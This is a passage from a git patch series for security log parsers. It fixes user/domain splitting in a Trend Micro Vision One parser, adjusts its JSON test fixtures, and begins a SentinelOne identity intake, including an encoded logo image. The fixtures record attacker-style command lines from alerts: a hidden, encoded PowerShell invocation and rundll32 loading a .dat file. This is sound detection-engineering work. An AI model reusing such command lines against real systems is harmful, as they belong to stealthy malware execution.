\"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}",
     "event": {
       "category": [
         "intrusion_detection"
@@ -33,10 +33,6 @@
       "product": "Vision One",
       "vendor": "TrendMicro"
     },
-    "organization": {
-      "id": "john\\doe",
-      "name": "john\\doe"
-    },
     "process": {
       "command_line": "C:\\WINDOWS\\Explorer.EXE",
       "executable": "C:\\Windows\\explorer.exe",
@@ -68,6 +64,8 @@
       }
     },
     "user": {
+      "domain": "doe",
+      "id": "john\\doe",
       "name": "doe"
     }
   }
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index d6ef4acd1..560c2ce13 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json	
@@ -33,10 +33,6 @@
       "product": "Vision One",
       "vendor": "TrendMicro"
     },
-    "organization": {
-      "id": "shockwave\\sam",
-      "name": "shockwave\\sam"
-    },
     "process": {
       "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=",
       "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
@@ -50,6 +46,9 @@
       ],
       "ip": [
         "10.10.58.51"
+      ],
+      "user": [
+        "shockwave"
       ]
     },
     "rule": {
@@ -62,6 +61,11 @@
         "severity": "high",
         "status": "Open"
       }
+    },
+    "user": {
+      "domain": "sam",
+      "id": "shockwave\\sam",
+      "name": "shockwave"
     }
   }
 }
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 3c32834ae..9159ec844 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
@@ -29,10 +29,6 @@
       "product": "Vision One",
       "vendor": "TrendMicro"
     },
-    "organization": {
-      "id": "shockwave\\sam",
-      "name": "shockwave\\sam"
-    },
     "process": {
       "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint",
       "parent": {
@@ -52,6 +48,9 @@
     "related": {
       "ip": [
         "10.10.58.51"
+      ],
+      "user": [
+        "shockwave"
       ]
     },
     "rule": {
@@ -68,7 +67,10 @@
       }
     },
     "user": {
-      "email": "support@pctutordetroit.com"
+      "domain": "sam",
+      "email": "support@pctutordetroit.com",
+      "id": "shockwave\\sam",
+      "name": "shockwave"
     }
   }
 }
\ No newline at end of file

From e93cd918eba05ba91b7e501ccd72d2f4c383c05d Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <135212489+lvoloshyn-sekoia@users.noreply.github.com>
Date: Tue, 26 Nov 2024 12:10:22 +0200
Subject: [PATCH 284/317] Update Trend
 Micro/trend-micro-vision-one/ingest/parser.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Sébastien Quioc <sebastien.quioc@sekoia.fr>
---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 3446a59f6..09ca7f331 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
@@ -41,8 +41,8 @@ stages:
           user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"
 
       - set:
-          user.name: "{{final.user.id.split('\\\\')[0]}}"
-          user.domain: "{{final.user.id.split('\\\\')[1]}}"
+          user.name: "{{final.user.id.split('\\\\') | last}}"
+          user.domain: "{{final.user.id.split('\\\\') | first}}"
         filter: "{{final.user.id != null}}"
 
       - set:

From 454ad36347fe76d2363d7652a1d1a89125f5f15c Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 26 Nov 2024 12:11:14 +0200
Subject: [PATCH 285/317] Fix tests

---
 .../tests/test_internal_network_scanner.json                | 2 +-
 Trend Micro/trend-micro-vision-one/tests/test_process.json  | 6 +++---
 Trend Micro/trend-micro-vision-one/tests/test_registry.json | 6 +++---
 3 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index 769477b65..b31951fe2 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
@@ -64,7 +64,7 @@
       }
     },
     "user": {
-      "domain": "doe",
+      "domain": "john",
       "id": "john\\doe",
       "name": "doe"
     }
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 560c2ce13..9c013b1c0 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json	
@@ -48,7 +48,7 @@
         "10.10.58.51"
       ],
       "user": [
-        "shockwave"
+        "sam"
       ]
     },
     "rule": {
@@ -63,9 +63,9 @@
       }
     },
     "user": {
-      "domain": "sam",
+      "domain": "shockwave",
       "id": "shockwave\\sam",
-      "name": "shockwave"
+      "name": "sam"
     }
   }
 }
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 9159ec844..83d7e99b5 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
@@ -50,7 +50,7 @@
         "10.10.58.51"
       ],
       "user": [
-        "shockwave"
+        "sam"
       ]
     },
     "rule": {
@@ -67,10 +67,10 @@
       }
     },
     "user": {
-      "domain": "sam",
+      "domain": "shockwave",
       "email": "support@pctutordetroit.com",
       "id": "shockwave\\sam",
-      "name": "shockwave"
+      "name": "sam"
     }
   }
 }
\ No newline at end of file

From 0cc29cf19f55d2373a36d2a9d29729216df11881 Mon Sep 17 00:00:00 2001
From: vg-svitla <v.huriev@svitla.com>
Date: Wed, 27 Nov 2024 12:15:11 +0200
Subject: [PATCH 286/317] Feature: SentinelOne Singularity

---
 SentinelOne/identity/CHANGELOG.md             |   8 +++
 SentinelOne/identity/_meta/fields.yml         |  39 ++++++++++
 SentinelOne/identity/_meta/logo.png           | Bin 0 -> 27937 bytes
 SentinelOne/identity/_meta/manifest.yml       |   8 +++
 .../identity/_meta/smart-descriptions.json    |  46 ++++++++++++
 SentinelOne/identity/ingest/parser.yml        |  67 ++++++++++++++++++
 SentinelOne/identity/tests/test_alert_1.json  |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_10.json |  34 +++++++++
 SentinelOne/identity/tests/test_alert_11.json |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_12.json |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_13.json |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_14.json |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_15.json |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_16.json |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_2.json  |  22 ++++++
 SentinelOne/identity/tests/test_alert_3.json  |  34 +++++++++
 SentinelOne/identity/tests/test_alert_4.json  |  34 +++++++++
 SentinelOne/identity/tests/test_alert_5.json  |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_6.json  |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_7.json  |  49 +++++++++++++
 SentinelOne/identity/tests/test_alert_8.json  |  34 +++++++++
 SentinelOne/identity/tests/test_alert_9.json  |  34 +++++++++
 22 files changed, 850 insertions(+)
 create mode 100644 SentinelOne/identity/CHANGELOG.md
 create mode 100644 SentinelOne/identity/_meta/fields.yml
 create mode 100644 SentinelOne/identity/_meta/logo.png
 create mode 100644 SentinelOne/identity/_meta/manifest.yml
 create mode 100644 SentinelOne/identity/_meta/smart-descriptions.json
 create mode 100644 SentinelOne/identity/ingest/parser.yml
 create mode 100644 SentinelOne/identity/tests/test_alert_1.json
 create mode 100644 SentinelOne/identity/tests/test_alert_10.json
 create mode 100644 SentinelOne/identity/tests/test_alert_11.json
 create mode 100644 SentinelOne/identity/tests/test_alert_12.json
 create mode 100644 SentinelOne/identity/tests/test_alert_13.json
 create mode 100644 SentinelOne/identity/tests/test_alert_14.json
 create mode 100644 SentinelOne/identity/tests/test_alert_15.json
 create mode 100644 SentinelOne/identity/tests/test_alert_16.json
 create mode 100644 SentinelOne/identity/tests/test_alert_2.json
 create mode 100644 SentinelOne/identity/tests/test_alert_3.json
 create mode 100644 SentinelOne/identity/tests/test_alert_4.json
 create mode 100644 SentinelOne/identity/tests/test_alert_5.json
 create mode 100644 SentinelOne/identity/tests/test_alert_6.json
 create mode 100644 SentinelOne/identity/tests/test_alert_7.json
 create mode 100644 SentinelOne/identity/tests/test_alert_8.json
 create mode 100644 SentinelOne/identity/tests/test_alert_9.json

diff --git a/SentinelOne/identity/CHANGELOG.md b/SentinelOne/identity/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/SentinelOne/identity/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/SentinelOne/identity/_meta/fields.yml b/SentinelOne/identity/_meta/fields.yml
new file mode 100644
index 000000000..36e8acf65
--- /dev/null
+++ b/SentinelOne/identity/_meta/fields.yml
@@ -0,0 +1,39 @@
+sentinelone.identity.attackSurfaces:
+  description: ''
+  name: sentinelone.identity.attackSurfaces
+  type: keyword
+
+sentinelone.identity.classification:
+  description: ''
+  name: sentinelone.identity.classification
+  type: keyword
+
+sentinelone.identity.confidenceLevel:
+  description: ''
+  name: sentinelone.identity.confidenceLevel
+  type: keyword
+
+sentinelone.identity.id:
+  description: ''
+  name: sentinelone.identity.id
+  type: keyword
+
+sentinelone.identity.name:
+  description: ''
+  name: sentinelone.identity.name
+  type: keyword
+
+sentinelone.identity.result:
+  description: ''
+  name: sentinelone.identity.result
+  type: keyword
+
+sentinelone.identity.status:
+  description: ''
+  name: sentinelone.identity.status
+  type: keyword
+
+sentinelone.identity.storyLineId:
+  description: ''
+  name: sentinelone.identity.storyLineId
+  type: keyword
diff --git a/SentinelOne/identity/_meta/logo.png b/SentinelOne/identity/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..bad66643418120e4e1dbdc385258d64188b37661
GIT binary patch
literal 27937
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
